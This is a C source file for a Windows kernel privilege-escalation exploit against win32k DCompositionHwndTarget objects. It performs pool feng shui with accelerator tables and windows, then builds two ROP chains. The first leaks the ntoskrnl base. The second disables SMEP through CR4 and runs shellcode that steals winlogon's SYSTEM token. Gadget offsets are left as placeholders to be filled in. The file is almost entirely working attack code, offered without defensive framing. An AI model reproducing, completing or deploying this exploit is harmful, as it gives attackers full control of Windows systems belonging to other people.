#include <Windows.h>
#include "Exploiter.h"

static const int AccelArrayBase = 0x43000000;
static const int HwndArrayBase = 0x44000000;
static const int DcomArrayBase = 0x41000000;
static const int PayloadBase = 0x42000000;
// Not using const to make the compiler to store
// the variables in .data
static ULONGLONG win32kPopRaxRet = 0xdeedbeefdeedbe01;
static ULONGLONG win32kXchgRaxRsp = 0xdeedbeefdeedbe02;
static ULONGLONG win32kExAllocatePoolWithTag = 0xdeedbeefdeedbe03;
static ULONGLONG win32kPopRcxRet = 0xdeedbeefdeedbe04;
static ULONGLONG win32kDefRaxIntoRcx = 0xdeedbeefdeedbe05;
static ULONGLONG win32kWriteRaxIntoRcx = 0xdeedbeefdeedbe06;
static ULONGLONG win32kPopRbxRet = 0xdeedbeefdeedbe07;
static ULONGLONG win32kRet = 0xdeedbeefdeedbe08;
static ULONGLONG win32kMovRaxR11Ret = 0xdeedbeefdeedbe09;
static ULONGLONG win32kAddRaxRcxRet = 0xdeedbeefdeedbe0a;
static ULONGLONG win32kPopEspRet = 0xdeedbeefdeedbe0b;
static ULONGLONG win32kXchgRaxRspAdjust = 0xdeedbeefdeedbe0c;
static ULONGLONG win32kCHwndDelete = 0xdeedbeefdeedbe0d;
static ULONGLONG ntSetCr4 = 0xdeedbeefdeedbe0e;
static ULONGLONG ntExAllocatePoolWithTag = 0xdeedbeefdeedbe0f;

typedef NTSTATUS(__stdcall *FuncCreateDCompositionHwndTarget) (
	_In_   HANDLE hWnd,
	_In_   DWORD dwNum,
	_Out_  ULONGLONG pMem
	);

typedef NTSTATUS(__stdcall *FuncDestroyDCompositionHwndTarget) (
	_In_   HANDLE hWnd,
	_In_   DWORD dwNum
	);

typedef LRESULT(WINAPI *FuncDefWindowProcA) (
	_In_  HWND hWnd,
	_In_  UINT Msg,
	_In_  WPARAM wParam,
	_In_  LPARAM lParam
	);

static CHAR sc[] = {
	'\x4D', '\x8B', '\xBB', '\x68', '\x01', '\x00', '\x00',                                  // mov r15, [r11+0x168], save return address of kernel stack
	'\x41', '\x51',                                                                          // push r9 save regs
	'\x41', '\x52',                                                                          // push r10
	'\x65', '\x4C', '\x8B', '\x0C', '\x25', '\x88', '\x01', '\x00', '\x00',                  // mov r9, gs:[0x188], get _ETHREAD from KPCR (PRCB @ 0x180 from KPCR, _ETHREAD @ 0x8 from PRCB)
	'\x4D', '\x8B', '\x89', '\xB8', '\x00', '\x00', '\x00',                                  // mov r9, [r9+0xb8], get _EPROCESS from _ETHREAD
	'\x4D', '\x89', '\xCA',                                                                  // mov r10, r9 save current eprocess
	'\x4D', '\x8B', '\x89', '\x40', '\x02', '\x00', '\x00',                                  // mov r9, [r9+0x240] $a, get blink
	'\x49', '\x81', '\xE9', '\x38', '\x02', '\x00', '\x00',                                  // sub r9, 0x238 => _KPROCESS
	'\x41', '\x81', '\xB9', '\x38', '\x04', '\x00', '\x00', '\x77', '\x69', '\x6E', '\x6C',  // cmp [r9+0x438], 0x6c6e6977 does ImageName begin with 'winl' (winlogon)
	'\x75', '\xe5',                                                                          // jnz $a no? then keep searching!
	'\x4D', '\x8B', '\xA1', '\xE0', '\x02', '\x00', '\x00',                                  // mov r12, [r9+0x2e0] get pid
	'\x48', '\xC7', '\xC0', '\x00', '\x10', '\x00', '\x42',                                  // mov rax, 0x42001000
	'\x4C', '\x89', '\x20',                                                                  // mov [rax], r12 save pid for use later
	'\x4D', '\x8B', '\x89', '\x48', '\x03', '\x00', '\x00',                                  // mov r9, [r9+0x348] get token
	'\x49', '\x83', '\xE1', '\xF0',															 // and r9, 0xfffffffffffffff0 get SYSTEM token's address
	'\x49', '\x83', '\x41', '\xD0', '\x0A',													 // add [r9-0x30], 0x10 increment SYSTEM token's reference count by 0x10
	'\x4D', '\x89', '\x8A', '\x48', '\x03', '\x00', '\x00',                                  // mov [r10+0x348], r9 replace our token with system token
	'\x41', '\x5A',                                                                          // pop r10 restore regs
	'\x41', '\x59',                                                                          // pop r9
	'\x41', '\x53',                                                                          // push r11, pointer near to original stack
	'\x5C',                                                                                  // pop rsp
	'\x48', '\x83', '\xec', '\x28',                                                          // sub rsp, 0x28, restore original kernel rsp
	'\xFF', '\x24', '\x25', '\x70', '\x50', '\x00', '\x42',                                  // jmp [0x42005070], continue on to delete the object CHwndTargetProp::Delete(void)
	0
};
static HWND *pHwnds = NULL;
static HACCEL *pAccels = NULL;
static FuncCreateDCompositionHwndTarget MyCreateDCompositionHwndTarget = NULL;
static FuncDestroyDCompositionHwndTarget MyDestroyDCompositionHwndTarget = NULL;


// WndProc is a callback function that is needed when creating a window.
// It does nothing of consequence. However, the exploit relies on overriding
// a suitable object (`CreateDCompositionHwndTarget`), which requires a
// window. Hence we need to create windows.
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
	FuncDefWindowProcA MyDefWindowProcA;
	ULONGLONG          pMyDefWindowProcA;

	pMyDefWindowProcA = *(ULONGLONG *)(PayloadBase + 0x1950);
	MyDefWindowProcA = (FuncDefWindowProcA)pMyDefWindowProcA;
	return MyDefWindowProcA(hwnd, msg, wParam, lParam);
}

VOID ExploiterInit() {
	LoadLibrary("USER32.dll");
	HMODULE user32 = GetModuleHandle("USER32.dll");
	MyCreateDCompositionHwndTarget = (FuncCreateDCompositionHwndTarget)GetProcAddress(user32, "CreateDCompositionHwndTarget");
	MyDestroyDCompositionHwndTarget = (FuncDestroyDCompositionHwndTarget)GetProcAddress(user32, "DestroyDCompositionHwndTarget");
	// Allocate memory regions that we use to store various data.
	VirtualAlloc((LPVOID)DcomArrayBase, 0x2000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	VirtualAlloc((LPVOID)PayloadBase, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	SecureZeroMemory((LPVOID)PayloadBase, 0x10000);
	memcpy((LPVOID)PayloadBase, sc, sizeof(sc));

	// Save the function pointer of DefWindowProcA globally while we are still in user-mode.
	// The callback (WndProc) that runs in kernel mode later cannot call `GetProcAddressWithHash`
	// any more. Hence, we store this first, so that WndProc can access it directly later.
	ULONGLONG *pDefWindowProcA = (ULONGLONG *)(PayloadBase + 0x1950);
	*pDefWindowProcA = (ULONGLONG)GetProcAddress(user32, "DefWindowProcA"); // ntdll's DefWindowProcA's hash
}

VOID ExploiterDoFengShui() {
	HINSTANCE hThisInstance;
	ATOM classAtom;
	WNDCLASSEXA windowClass;
	HWND hWnd;
	HACCEL hAccel;
	LPACCEL lpAccel;
	// Strings needed.
	CHAR winClass[] = { 'w', 'i', 'n', 'c', 'l', 's', '0', '0', '0', '0', 0 };
	CHAR winClassFmt[] = { 'w', 'i', 'n', 'c', 'l', 's', '%', '0', '4', 'x', 0 };
	CHAR winTitle[] = { 'w', 'i', 'n', 't', 'i', 't', '0', '0', '0', '0', 0 };
	CHAR winTitleFmt[] = { 'w', 'i', 'n', 't', 'i', 't', '%', '0', '4', 'x', 0 };

	// Initial setup for pool fengshui.
	lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
	SecureZeroMemory(lpAccel, sizeof(ACCEL));

	// Create many accelerator tables, and store them.
	pAccels = (HACCEL *)VirtualAlloc((LPVOID)(AccelArrayBase), sizeof(HACCEL)* 5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	for (INT i = 0; i < 5000; i++) {
		hAccel = CreateAcceleratorTableA(lpAccel, 1);
		pAccels[i] = hAccel;
	}

	// Create window handles, and store them.
	pHwnds = (HWND *)VirtualAlloc((LPVOID)(HwndArrayBase), sizeof(HWND)* 1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	hThisInstance = GetModuleHandleA(NULL);
	for (INT i = 0; i < 1000; i++) {
		SecureZeroMemory(&windowClass, sizeof(WNDCLASSEXA));
		wsprintfA(winClass, winClassFmt, i);
		wsprintfA(winTitle, winTitleFmt, i);

		windowClass.cbSize = sizeof(WNDCLASSEXA);
		windowClass.style = CS_HREDRAW | CS_VREDRAW;
		windowClass.lpfnWndProc = (WNDPROC)WndProc;
		windowClass.hInstance = hThisInstance;
		windowClass.hIcon = NULL;
		windowClass.hCursor = NULL;
		windowClass.hbrBackground = (HBRUSH)COLOR_WINDOW;
		windowClass.lpszMenuName = NULL;
		windowClass.lpszClassName = winClass;
		classAtom = RegisterClassExA(&windowClass);
		hWnd = CreateWindowEx(0, MAKEINTATOM(classAtom), winTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hThisInstance, NULL);

		if (hWnd) {
			pHwnds[i] = hWnd;
		}
		else {
			break;
		}
	}

	// Create holes in the series of accelerator tables.
	for (INT i = 3600; i < 4600; i += 2) {
		DestroyAcceleratorTable(pAccels[i]);
	}

	// Fill the holes with with DCompositionHwndTarget(s).
	// (at this point we have a series of alternating DCompositionHwndTarget objects)
	for (INT i = 0; i < 500; i++) {
		MyCreateDCompositionHwndTarget(pHwnds[i], 0, DcomArrayBase + i * 4);
	}

	// Create "adjacent" holes (to the previous holes) in the series of
	// accelerator tables.
	for (INT i = 3601; i < 4601; i += 2) {
		DestroyAcceleratorTable(pAccels[i]);
	}

	// Fill the holes with with DCompositionHwndTarget(s).
	// (at this point we have a contiguous series of DCompositionHwndTarget objects)
	for (INT i = 500; i < 1000; i++) {
		MyCreateDCompositionHwndTarget(pHwnds[i], 0, DcomArrayBase + i * 4);
	}

	// Create some holes in the contiguous series of DCompositionHwndTarget objects,
	// that we insert the vulnerable object into.
	for (INT i = 400; i < 405; i++) {
		MyDestroyDCompositionHwndTarget(pHwnds[i], 0);
	}
}

// Clean up for the heap fengshui performed earlier (for cleanliness, reliability).
VOID ExpoiterCleanUp() {
	for (INT i = 0; i < 5000; i++) {
		DestroyAcceleratorTable(pAccels[i]);
	}
}

// Setup stack pivot and adjustment, also the ROP chain 1 to etrieve base address 
// of `ntoskrnl`.
VOID ExploiterSetupFirstChain(ULONGLONG win32kBaseAddr) {
	// Stack pivot and adjustment.
	//
	// IMPORTANT NOTE.
	// 
	// This vTable is actually accessed twice as part of the code flow. 
	// The first access is to the 2nd method in the vTable, at [RAX+8] (*).
	// The second access is to the 1st method in the vTable, at [RAX] (**).
	//
	// (*) First access
	//
	// As mentioned, in the code flow, there is a CALL [RAX+8], where RAX is the
	// address of the fake vTable (0x42005000). 
	//
	// The call places us at [0x42005000+8], which is the xchg instruction 
	// (stack pivot). At this point after the xchg, RSP is pointing to 0x42005000.
	// The next instruction of the gadget is RET, which will exec. POP RAX.
	// This sequence (RET + POP) shifts RSP by a total of 16 bytes, which is the
	// start of ROP chain 1.
	//
	*(ULONGLONG *)(PayloadBase + 0x5000) = win32kBaseAddr + win32kPopRaxRet;   // pop rax # ret               <-- RAX
	*(ULONGLONG *)(PayloadBase + 0x5008) = win32kBaseAddr + win32kXchgRaxRsp;  // xchg rax, rsp # ret (pivot) <-- this is where (1st) CALL jumps to.
	//
	// --- End stack pivot and adjustment ---

	// ROP chain 1: Retrieve base address of `ntoskrnl`.
	//
	// When ROP chain 1 exits, RBX will hold the address of the our 
	// (fake) vTable. And 0x42000100 will hold the (leaked) address of
	// `ntoskrnl!ExAllocatePoolWithTag`.
	//
	*(ULONGLONG *)(PayloadBase + 0x5010) = win32kBaseAddr + win32kPopRaxRet;             // pop rax # ret  (RAX is source for our write)
	*(ULONGLONG *)(PayloadBase + 0x5018) = win32kBaseAddr + win32kExAllocatePoolWithTag; // pop into rax   (pointer to leaked address of `ntoskrnl!ExAllocatePoolWithTag` that win32k imports)
	*(ULONGLONG *)(PayloadBase + 0x5020) = win32kBaseAddr + win32kPopRcxRet;             // pop rcx # ret  (RCX is destination for our write)
	*(ULONGLONG *)(PayloadBase + 0x5028) = PayloadBase + 0x100;                          // pop into rcx   (memory to write leaked address)
	*(ULONGLONG *)(PayloadBase + 0x5030) = win32kBaseAddr + win32kDefRaxIntoRcx;         // mov rax, [rax] # mov [rcx], rax # ret (write gadget to [RCX])

	// (**) Second access
	//
	// The second time the vTable is accessed (described above), it will
	// try to execute `POP RAX # RET`, which is undesirable. Hence, as part of
	// the *first* ROP chain, we override the vTable again, so that the second
	// access to it will be okay.
	//
	// When the code flow resumes after ROP chain 1 ends, the code will
	// use *RBX for its second access to the vTable. Hence, we want to 
	// place our own value into RBX. Therefore, we `POP RBX`, which places
	// 0x42005100 into RBX. 0x42005100 is yet another (unused) memory
	// region that we control. We will construct a new fake vTable at 0x42005100.
	//
	*(ULONGLONG *)(PayloadBase + 0x5038) = win32kBaseAddr + win32kPopRbxRet;    // pop rbx # ret
	*(ULONGLONG *)(PayloadBase + 0x5040) = PayloadBase + 0x5100;        // this will clobber the existing vTable object pointer (RBX) -------------------------------
	//                                                                                                                                                               |
	// Setup the new fake vTable at 0x42005100. We don't do anything interesting                                                                                     |
	// with the second call. We just want it to return nicely.                                                                                                       |
	*(ULONGLONG *)(PayloadBase + 0x5100) = PayloadBase + 0x5110;        // double-dereference to get to gadget                                     (actual ROP chain |
	*(ULONGLONG *)(PayloadBase + 0x5108) = PayloadBase + 0x5110;        // (arbitrary pointer to pointer)                                            continues here) |
	*(ULONGLONG *)(PayloadBase + 0x5110) = win32kBaseAddr + win32kRet;  // (`RET` gadget)                                                                            |
	//                                                                                                                                                               |
	// Resume execution. Restore original stack pointer.                                                                                                             |
	*(ULONGLONG *)(PayloadBase + 0x5048) = win32kBaseAddr + win32kMovRaxR11Ret;    // mov rax, r11 # ret (register holding a value close to original stack pointer) <-
	*(ULONGLONG *)(PayloadBase + 0x5050) = win32kBaseAddr + win32kPopRcxRet;       // pop rcx # ret
	*(ULONGLONG *)(PayloadBase + 0x5058) = 0x8;                                    // pop into rcx
	*(ULONGLONG *)(PayloadBase + 0x5060) = win32kBaseAddr + win32kAddRaxRcxRet;    // add rax, rcx # ret (adjust the stack pointer)
	*(ULONGLONG *)(PayloadBase + 0x5068) = win32kBaseAddr + win32kPopRcxRet;       // pop rcx # ret
	*(ULONGLONG *)(PayloadBase + 0x5070) = PayloadBase + 0x5088;                   // pop into rcx
	*(ULONGLONG *)(PayloadBase + 0x5078) = win32kBaseAddr + win32kWriteRaxIntoRcx; // mov [rcx], rax # ret (write gadget to [RCX])--
	*(ULONGLONG *)(PayloadBase + 0x5080) = win32kBaseAddr + win32kPopEspRet;                // pop rsp # ret                                 |
	//*(ULONGLONG *)(PayloadBase + 0x5088) <----------------------------------------------------------------------------------------
}

// Setup the ROP chain 2, Disable SMEP and return to token stealing shellcode.
// Now we reset the values in our fake vTable (0x42005000), with a new
// ROP chain. This gets called later in the second trigger.
VOID ExploiterSetupSecondChain(ULONGLONG win32kBaseAddr, ULONGLONG ntBaseAddr) {
	*(ULONGLONG *)(PayloadBase + 0x5000) = win32kBaseAddr + win32kXchgRaxRspAdjust; // xchg eax, esp # sbb al, 0 # mov eax, ebx # add rsp, 0x20 # pop rbx # ret
	*(ULONGLONG *)(PayloadBase + 0x5008) = win32kBaseAddr + win32kRet;		        // filler
	*(ULONGLONG *)(PayloadBase + 0x5010) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5018) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5020) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5028) = win32kBaseAddr + win32kPopRaxRet;        // pop rax # ret
	*(ULONGLONG *)(PayloadBase + 0x5030) = 0x406f8;                                 // pop into rax, cr4 value 
	*(ULONGLONG *)(PayloadBase + 0x5038) = ntBaseAddr + ntSetCr4;                   // mov cr4, rax # add rsp, 0x28 # ret  (SMEP disabling gadget)
	*(ULONGLONG *)(PayloadBase + 0x5040) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5048) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5050) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5058) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5060) = win32kBaseAddr + win32kRet;              // filler
	*(ULONGLONG *)(PayloadBase + 0x5068) = PayloadBase;                             // return to userland and win!
	*(ULONGLONG *)(PayloadBase + 0x5070) = win32kBaseAddr + win32kCHwndDelete;      // CHwndTargetProp::Delete(void)
}

// First trigger (ROP chain 1)
//
// When `DestroyDCompositionHwndTarget` is called, it will destroy the object
// by calling its destructor, which will make use of the overwritten vTable
// pointer. This, we abuse, to call ROP chain 1. ROP chain 1 leaks the address
// of `ntoskrnl!ExAllocatePoolWithTag`.
VOID ExploiterRunFirstChain() {
	for (INT i = 0; i < 1000; i++) {
		MyDestroyDCompositionHwndTarget(pHwnds[i], 0);
	}
}

// Second trigger (ROP chain 2)
//
// When `DestroyWindow` is called, it will attempt to find any dangling
// references to the window. Because the "first trigger" did not properly
// destroy the `DCompositionHwndTarget` object (which has a reference to 
// the window), `DestroyWindow` will try, again, to call the destructor
// for the `DCompositionHwndTarget` object. Hence, the same destructor is
// called. But because we have already re-setup the vTable, it calls
// ROP chain 2.
VOID ExploiterRunSecondChain() {
	for (INT i = 0; i < 1000; i++) {
		DestroyWindow(pHwnds[i]);
	}
}

// Compute actual base address of `ntoskrnl` from `ntoskrnl!ExAllocatePoolWithTag`.
ULONGLONG ExploiterGetNtBase() {
	return *(ULONGLONG *)(PayloadBase + 0x100) - ntExAllocatePoolWithTag;
}